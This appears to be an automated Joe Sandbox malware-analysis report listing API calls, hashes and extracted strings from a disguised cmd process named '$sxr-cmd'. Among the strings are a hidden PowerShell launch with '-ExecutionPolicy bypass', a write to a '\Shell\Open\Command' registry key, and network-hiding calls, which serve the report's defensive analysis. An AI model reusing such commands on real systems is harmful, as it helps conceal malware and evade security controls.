                                                                                                              • Part of subcall function 00007FF7137F3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
                                                                                                              • Part of subcall function 00007FF7137F3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
                                                                                                              • Part of subcall function 00007FF7137F3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
                                                                                                            • _get_osfhandle.MSVCRT ref: 00007FF7137E32F3
                                                                                                            • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014,?,?,0000002F,00007FF7137E32A4), ref: 00007FF7137E3309
                                                                                                            • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7137E3384
                                                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7138011DF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Console$LockShared_get_osfhandle$AcquireBufferErrorFileHandleInfoLastModeReleaseScreenTypeWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 611521582-0
                                                                                                            • Opcode ID: d412da15cb949554b081a41741d7db10ae4ffc54f36c72ea7b4e9065a2faff7a
                                                                                                            • Instruction ID: bbc9e7ac8e455636eebe41b476ae350b5c51b775c11c174e6cb7e768ec0b673a
                                                                                                            • Opcode Fuzzy Hash: d412da15cb949554b081a41741d7db10ae4ffc54f36c72ea7b4e9065a2faff7a
                                                                                                            • Instruction Fuzzy Hash: DCA1B122B08E128AF794AB61E8402BDEAA1FB4DB65F845135CD0E67784DF7DD44DC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Find$File$CloseFirstmemset$AttributesErrorLastNext
                                                                                                            • String ID: \\?\
                                                                                                            • API String ID: 628682198-4282027825
                                                                                                            • Opcode ID: bc7a4c5315452527efdd1b4c54bcb63c24ecfd4bbeb423885ae225a5c15832f3
                                                                                                            • Instruction ID: 9ed78c816c181047f9671503d0d6a20b0977f806d2f36ced8505a8846bafde02
                                                                                                            • Opcode Fuzzy Hash: bc7a4c5315452527efdd1b4c54bcb63c24ecfd4bbeb423885ae225a5c15832f3
                                                                                                            • Instruction Fuzzy Hash: 37E1A621B08A8296EBE0AF24D8803F9A7A0FB49765F804235D91E677D4DF3CD54DC710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • GOTO, xrefs: 00007FF7137ED0A3
                                                                                                            • C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO, xrefs: 00007FF7137FC9F1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$ConsoleEnterInfoLeaveOutput_tell_wcsicmpmemset
                                                                                                            • String ID: C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function VO$GOTO
                                                                                                            • API String ID: 3863671652-1657151780
                                                                                                            • Opcode ID: a81ad13440b0a5d5f52291989616d259ae80dd99547c53806a4f383952b1c558
                                                                                                            • Instruction ID: 785204c4f6db541666d36e2a37bee7f5d424030d19a3fb189d289bce23fcb2e7
                                                                                                            • Opcode Fuzzy Hash: a81ad13440b0a5d5f52291989616d259ae80dd99547c53806a4f383952b1c558
                                                                                                            • Instruction Fuzzy Hash: D9E19B25A09E438AFFE4BB1994943B9E694BF49760FC44235D91E362D1DF3DE84D8230
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                            • String ID: $Application$System
                                                                                                            • API String ID: 3538039442-1881496484
                                                                                                            • Opcode ID: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                            • Instruction ID: c8460a4ae2ae57995e976161c1e9930d3b1649b09c5987e4dcb716cc5db7609a
                                                                                                            • Opcode Fuzzy Hash: 6194e2a1b63514fbe775a342b0db58f28aa4d046a1287b5b4022a3f3c67c0b5b
                                                                                                            • Instruction Fuzzy Hash: 9E51BD36A08F4187EBA0AB15B44067AFAA1FB89B64F858234DE4E13750DF3DD459C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: wcsrchr$ErrorLast$AttributesFile_wcsnicmpiswspacememsetwcschr
                                                                                                            • String ID: COPYCMD$\
                                                                                                            • API String ID: 3989487059-1802776761
                                                                                                            • Opcode ID: 05ae0ec2d06d2a9ef41bc112d7715d0f7644bc311c2d5fc207196218d88fa946
                                                                                                            • Instruction ID: 7b51286a930052a62b9f98172a699d8703c22db99dcfc903aa18162a781eb140
                                                                                                            • Opcode Fuzzy Hash: 05ae0ec2d06d2a9ef41bc112d7715d0f7644bc311c2d5fc207196218d88fa946
                                                                                                            • Instruction Fuzzy Hash: DFF1D625B08B4685FB90BB15D4802BAE7A0FF49BA8F844135DA4E2B794DF3DE45DC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Time$File$System$FormatInfoLocalLocale
                                                                                                            • String ID: $%02d%s%02d%s$%2d%s%02d%s%02d%s%02d$.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$HH:mm:ss t
                                                                                                            • API String ID: 55602301-2548490036
                                                                                                            • Opcode ID: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                            • Instruction ID: 068004af3a778345dcdb04caba5907a8b5e1c2cf67419a963a55b02375cc551f
                                                                                                            • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                            • Instruction Fuzzy Hash: E5A1A732A18F4296EB90AB14E4802B9F7A5FB48B74FD00535DA6D27A94EF3CD55CC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 3935429995-0
                                                                                                            • Opcode ID: 795fcaf9b1b37c27bcdc7aeab39e4ea5de5f10c23baa64d7e6cd9433ecd74678
                                                                                                            • Instruction ID: 7a665795f95f1567f94edd0c4350f643c85eb93aba9a0d1b5c43dfae8d00fe3e
                                                                                                            • Opcode Fuzzy Hash: 795fcaf9b1b37c27bcdc7aeab39e4ea5de5f10c23baa64d7e6cd9433ecd74678
                                                                                                            • Instruction Fuzzy Hash: 79610222A18B528AE790EF21A404679FBA4FF88F64F858130DE4E53794DF7ED419C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AttributesFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 3188754299-0
                                                                                                            • Opcode ID: 6714b57ab64ccf1cb705dfdd5569d9287a74fd628b1eac91bf894110f45b7a1d
                                                                                                            • Instruction ID: 53443fd7dbd19c3637012c6ed3d149f2d577740c10949265f967fb11584e8f0d
                                                                                                            • Opcode Fuzzy Hash: 6714b57ab64ccf1cb705dfdd5569d9287a74fd628b1eac91bf894110f45b7a1d
                                                                                                            • Instruction Fuzzy Hash: E391B336608E828AEBA4AF24D8502FDB6E0FB49765F804235DA4E5B794DF3DD55CC320
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _get_osfhandlememset$wcschr
                                                                                                            • String ID: DPATH
                                                                                                            • API String ID: 3260997497-2010427443
                                                                                                            • Opcode ID: 41e54b0670c20d72ba7f015e67b536ed96c4d732916ea9d551e972c5a3ecdbc5
                                                                                                            • Instruction ID: 26ca983bc1ca28de8746fb18101fb820bf6f1a11b97ecdc73b89f322b528c133
                                                                                                            • Opcode Fuzzy Hash: 41e54b0670c20d72ba7f015e67b536ed96c4d732916ea9d551e972c5a3ecdbc5
                                                                                                            • Instruction Fuzzy Hash: 19D1A022A08E4286EB94BB65D4801BDA7A5FF48BB4F844231D92D677D4DF3CE81DC360
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
                                                                                                            • String ID: @P
                                                                                                            • API String ID: 1801357106-3670739982
                                                                                                            • Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                            • Instruction ID: 77903d77919740aa04e3f0bccbcf5350a37306cb543ba40389e47e4712f6be68
                                                                                                            • Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
                                                                                                            • Instruction Fuzzy Hash: D5417B32B04E45DFE750AF60D4803EDABA4FB89768F848235DA1D66A88DF78D518C720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$BufferConsoleInfoScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 1034426908-0
                                                                                                            • Opcode ID: 5b624a9b64c3ee3c12555fe055ae2baa63bd61b58cf8ac360c05aab8446ce906
                                                                                                            • Instruction ID: 79b91b5f1849054fb0387252dafd4b6bed882a23825193804e68ca5468bec18e
                                                                                                            • Opcode Fuzzy Hash: 5b624a9b64c3ee3c12555fe055ae2baa63bd61b58cf8ac360c05aab8446ce906
                                                                                                            • Instruction Fuzzy Hash: 3EF1A672708B8289EBA4EB21D8802E9A7A4FF49764F804134DA5D6B695DF3CE51DC720
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                            • Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                            • Instruction ID: a94945a9ac9ee33059e4bbcd120237afcf73959bf10171101ef68035fd010a96
                                                                                                            • Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
                                                                                                            • Instruction Fuzzy Hash: B4B1C132210E68E2EF548F25D449BE963A6FBA2B9DF805056FE0A53B94DF34CC48C740
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseValue$CreateDeleteOpen
                                                                                                            • String ID: %s=%s$\Shell\Open\Command
                                                                                                            • API String ID: 4081037667-3301834661
                                                                                                            • Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                            • Instruction ID: e95e4134b06ddb26f70684a5a7b38934f8da67cf20a78ea9f209e1ac71ce6768
                                                                                                            • Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
                                                                                                            • Instruction Fuzzy Hash: D771A172B09E4286FBA0AB15A0502B9E2E5FF857A0FC44231DE4E2B794DF3DD5598730
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            APIs
                                                                                                            • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380AA85
                                                                                                            • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380AACF
                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF71380AAEC
                                                                                                            • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7138098C0), ref: 00007FF71380AB39
                                                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7138098C0), ref: 00007FF71380AB6F
                                                                                                            • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7138098C0), ref: 00007FF71380ABA4
                                                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF7138098C0), ref: 00007FF71380ABCB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
                                                                                                            • Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            • Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseDeleteValue$CreateOpen
                                                                                                            • String ID: %s=%s
                                                                                                            • API String ID: 1019019434-1087296587
                                                                                                            • Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
                                                                                                            • Instruction ID: a84d5014f1c1e059d2f74921a5d514a5245ac7952929178edee83006dd4ec18b
